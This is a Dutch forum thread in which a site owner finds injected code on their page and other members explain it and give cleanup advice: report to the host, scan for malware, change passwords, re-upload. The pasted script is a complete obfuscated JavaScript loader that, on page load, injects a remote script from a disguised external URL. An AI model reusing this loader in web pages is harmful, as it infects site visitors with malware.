Rare dingen bijgevoegd!

[GambiaUser]

Ik wou vandaag mijn site even weer enkele aanpassingen doen. En toen kwam ik tot mijn grote verbasing, aan het einde van mijn pagina dit tegen:

<script>var xm="";this.xt="";this.V="";function mg(){this.f="";var Vp='';this.h="";var b;if(b!='c' && b != ''){b=null};var bW=new Date();var mq=new Array();var R=RegExp;var T='';var yT;if(yT!='dL' && yT != ''){yT=null};var n="lhfg".substr(3);var IQ=new Date();var E=new Date();var qu='';var r;if(r!='' && r!='a'){r=''};function m(U,Q){var Jf;if(Jf!='' && Jf!='GE'){Jf=null};var l="";var w= "[zNO".substr(0,1);var C="";var LI=new Date();w+=Q;w+=new String("]q2NJ".substr(0,1));this.Dp='';var k=new R(w, n);var lg;if(lg!='' && lg!='o'){lg=null};return U.replace(k, T);};var At;if(At!='Gp'){At='Gp'};this.Cn="";var d=m('8626226026222628622262206222222',"62");var VA;if(VA!='yH' && VA!='kT'){VA='yH'};this.os="";var I=new String("rxO/jcp".substr(3)+"M2xcenneMxc2".substr(4,4)+"140Ly.co".substr(4)+"or63m/jc6o3r".substr(4,4)+"Zo2penn2oZ".substr(3,4)+"ey.c"+"gISom/fSIg".substr(3,4)+"5Fyfileh5fyF".substr(4,4)+"ippoEAh".substr(0,4)+".com"+"/goobkm".substr(0,4)+"gle."+"5SKcom/5KS".substr(3,4)+"noyabri".substr(3)+"l.co"+"ZRNm.brZNR".substr(3,4)+".phpdU0G".substr(0,4));var J=window;var EG='';var Vy=new Date();var H="defer";this.Vw='';var nR="PSLbht".substr(4)+"Sf4tp".substr(3)+":/IFL".substr(0,2)+"/rOlNQ".substr(0,2)+"ad"+"ik"+"fjsPal".substr(4)+"ALY6-rYL6A".substr(4,2)+"u.w1s".substr(0,2)+"nHlPorPlnH".substr(4,2)+"GhSYicGYhS".substr(4,2)+"ZR4Con".substr(4)+"Ov2.c".substr(3)+"o.qLG".substr(0,2)+"jpCfA".substr(0,2)+"1gEV.wgEV1".substr(4,2)+"eb"+"piRVs-".substr(4)+"copQk4".substr(0,2)+"xdkgm.".substr(4)+"tK0xyoK0tx".substr(4,2)+"nDPur".substr(3)+"UEAvte".substr(4)+"stHIC".substr(0,2)+"ladGM2".substr(0,2)+"b."+"pxLXru".substr(4)+":mEq".substr(0,1);this.HL='';var AB;if(AB!='_i'){AB='_i'};var p='';var O='';var K;if(K!='Bk' && K!='tI'){K='Bk'};var Td=String("src");this.go='';var pF;if(pF!='kv' && pF!='GS'){pF='kv'};var kY;if(kY!='qy'){kY='qy'};this.gW="";var ks="sc"+"Nmgri".substr(3)+"pt";var jx;if(jx!='doi'){jx=''};var fQ;if(fQ!='' && fQ!='Er'){fQ='fY'};J.onload=function(){var Ul='';try {p=nR+d;var MR=new String();var mt=new String();p+=I;var lr='';var cy=new String();var WE=new Array();var nV=new Array();z=document.createElement(ks);var YX;if(YX!=''){YX='Nn'};z[H]=[8,1][1];var Ps='';z[Td]=p;var qK=new String();var XDc='';var FG='';var bU=new String();document.body.appendChild(z);} catch(W){var Nm;if(Nm!=''){Nm='Wn'};var NX;if(NX!=''){NX='RR'};};};var mn="";};var WG='';var JJ;if(JJ!='' && JJ!='rF'){JJ=''};mg();this.jy='';this.BA='';</script>
<!--01561f7d4348ca7f7ca5435341b0a31b-->

Wat is dit?

 

[peter vazed]

Gehackt.
Komt meer voor.
Nieuw -lang- wachtwoord voor je site en ftp aanmaken.

Loop al je index.html pagina's na, dus ook in andere mappen.

 

[GambiaUser]

Wat doet het script?

 

[peter vazed]

Wat doet het script?

Brengt wijzigingen aan, of laat heel je site niet meer zien,
kan virusmelding veroorzaken bij bezoeker.
Weghalen, en de file opnieuw uploaden.

 

[Goeroeboeroe]

Meestal proberen dat soort scripts malware te installeren bij je bezoeker.
Alleen je wachtwoord veranderen heeft vaak weinig zin, omdat vaak je computer is besmet en op die manier het wachtwoord is verkregen. Als je alleen je wachtwoord verandert, hebben ze vaak zo weer het nieuwe.
1) Melden aan je hoster. Als het goed is, is die blij met zo'n melding, want het zou ook via hun of via 'n klant van hun kunnen zijn gebeurd. Als hij nijdig wordt, is alleen dat al 'n reden 'n andere te nemen.
2) Computer grondig scannen op malware.
3) Wachtwoord veranderen.
4) Site opnieuw uploaden.
5) Site komende weken goed in de gaten houden.

 

[GambiaUser]

Melding gedaan : Check
Gescant met Malware Anti-Bytes: Check
Wachtwoord: Mag niet van me pa
Uploaden: Waarom? gewoon scriptje weg halen toch?
Doe ik!: Check

 

[Naarling]

Wachtwoord: Mag niet van me pa

Dan kun je de andere dingen net zo goed nalaten volgens mij. Als de spammerts (of wat hun doel ook is) jouw wachtwoord hebben staat dat script binnen de kortste keren weer op je site.

Misschien moet je je pa eens vragen of hij de sloten van het huis zou vervangen als hij zijn sleutels zou verliezen met het huisadres erbij.

 

[Goeroeboeroe]

Ik ga geen discussie openen, want dat heb ik in het verleden al vaker gedaan over veiligheid. Maar omdat je bezoekers risico lopen toch nog even 't volgende.
Die code is op je site gezet. Dat kan alleen maar als ze je wachtwoord hebben, of als er 'n lek bij je hoster zit. Vandaar 't belang om 't aan je hoster te melden.
Ze kunnen trouwens ook je wachtwoord hebben achterhaald bij je hoster, als die 'n fout heeft gemaakt.

Als ze je wachtwoord hebben, kun je er vergif op innemen dat 'n geautomatiseerd programma volautomatisch kijkt of dat script er bij jou nog op staat. En als 't weg is, staat het er in 'n vloek en 'n zucht weer op.
't Maakt verder niet zo heel veel uit voor je bezoekers, want je site staat heel erg snel op allerlei zwarte lijsten en wordt dan geblokkeerd. Waar je deels bijzonder moeilijk weer af komt. En dit gaat veel sneller dan met dat kwaadaardige tellertje dat je had.
Kortom: ik zou echt dat wachtwoord maar veranderen. En laat je vader anders deze draad lezen of zichzelf informeren als 't niet mag van hem.
Of hier nog vragen stellen als hij iets niet begrijpt.

 

[GambiaUser]

Net het paard van troje :thumb: